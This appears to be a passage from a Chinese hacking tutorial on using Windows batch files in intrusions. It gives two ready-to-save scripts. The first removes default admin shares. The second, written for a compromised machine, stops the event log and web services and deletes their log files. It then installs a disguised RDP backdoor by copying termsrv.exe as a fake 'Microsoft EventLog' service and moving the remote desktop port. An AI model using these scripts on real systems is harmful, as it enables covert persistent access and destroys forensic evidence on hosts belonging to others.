批处理文件是无格式的文本文件，它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称，或者双击该批处理文件，系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件（也被称为批处理程序或脚本），可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用，例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧。 (本文因篇幅较长，所以分成两部份。前半部份讲命令，后半部分讲实例分析。)

　　六、精彩实例放送

　　1.删除win2k/xp系统默认共享的批处理

　　------------------------ cut here then save as .bat or .cmd file ---------------------------

　　@echo preparing to delete all the default shares.when ready pres any key.

　　@pause

　　@echo off

　　:Rem check parameters if null show usage.

　　if {%1}=={} goto :Usage

　　:Rem code start.

　　echo.

　　echo ------------------------------------------------------

　　echo.

　　echo Now deleting all the default shares.

　　echo.

　　net share %1$ /delete

　　net share %2$ /delete

　　net share %3$ /delete

　　net share %4$ /delete

　　net share %5$ /delete

　　net share %6$ /delete

　　net share %7$ /delete

　　net share %8$ /delete

　　net share %9$ /delete

　　net stop Server

　　net start Server

　　echo.

　　echo All the shares have been deleteed

　　echo.

　　echo ------------------------------------------------------

　　echo.

　　echo Now modify the registry to change the system default properties.

　　echo.

　　echo Now creating the registry file

　　echo Windows Registry Editor Version 5.00> c:\delshare.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg

　　echo "AutoShareWks"=dword:00000000>> c:\delshare.reg

　　echo "AutoShareServer"=dword:00000000>> c:\delshare.reg

　　echo Nowing using the registry file to chang the system default properties.

　　regedit /s c:\delshare.reg

　　echo Deleting the temprotarily files.

　　del c:\delshare.reg

　　goto :END

　　:Usage

　　echo.

　　echo ------------------------------------------------------

　　echo.

　　echo ☆ A example for batch file ☆

　　echo ☆ [Use batch file to change the sysytem share properties.] ☆

　　echo.

　　echo Author：Ex4rch

　　echo Mail:Ex4rch@hotmail.com

　　echo.

　　echo Error：Not enough parameters

　　echo.

　　echo ☆ Please enter the share disk you wanna delete ☆

　　echo.

　　echo For instance，to delete the default shares:

　　echo delshare c d e ipc admin print

　　echo.

　　echo If the disklable is not as C: D: E: ，Please chang it youself.

　　echo.

　　echo example：

　　echo If locak disklable are C: D: E: X: Y: Z: ，you should chang the command into ：

　　echo delshare c d e x y z ipc admin print

　　echo.

　　echo *** you can delete nine shares once in a useing ***

　　echo.

　　echo ------------------------------------------------------

　　goto :EOF

　　:END

　　echo.

　　echo ------------------------------------------------------

　　echo.

　　echo OK,delshare.bat has deleted all the share you assigned.

　　echo.Any questions ,feel free to mail to Ex4rch@hotmail.com.

　　echo

　　echo.

　　echo ------------------------------------------------------

　　echo.

　　:EOF

　　echo end of the batch file

　　------------------------ cut here then save as .bat or .cmd file ---------------------------

　　------------------------ cut here then save as .bat or .cmd file ---------------------------

　　下面命令是清除肉鸡所有日志，禁止一些危险的服务，并修改肉鸡的terminnal service留跳后路。

　　@regedit /s patch.dll

　　@net stop w3svc

　　@net stop event log

　　@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q

　　@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q

　　@del c:\winnt\system32\config\*.event /f /q

　　@del c:\winnt\system32dtclog\*.* /f /q

　　@del c:\winnt\*.txt /f /q

　　@del c:\winnt\*.log /f /q

　　@net start w3svc

　　@net start event log

　　@rem [删除日志]

　　@net stop lanmanserver /y

　　@net stop Schedule /y

　　@net stop RemoteRegistry /y

　　@del patch.dll

　　@echo The server has been patched,Have fun.

　　@del patch.bat

　　@REM [禁止一些危险的服务。]

　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll

　　@echo "PortNumber"=dword:00002010 >>patch.dll

　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll

　　@echo "PortNumber"=dword:00002012 >>patch.dll

　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll

　　@echo "Start"=dword:00000002 >>patch.dll

　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll

　　@echo "Start"=dword:00000002 >>patch.dll

　　@echo "ErrorControl"=dword:00000001 >>patch.dll

　　@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll

　　@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll

　　@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll

　　@echo "ObjectName"="LocalSystem" >>patch.dll

　　@echo "Type"=dword:00000010 >>patch.dll

　　@echo "Description"="Keep record of the program and windows message。" >>patch.dll

　　@echo "DisplayName"="Microsoft EventLog" >>patch.dll

　　@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll

　　@echo "Start"=dword:00000004 >>patch.dll

　　@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe

　　@REM [修改3389连接，端口为8210(十六进制为00002012)，名称为Microsoft EventLog，留条后路]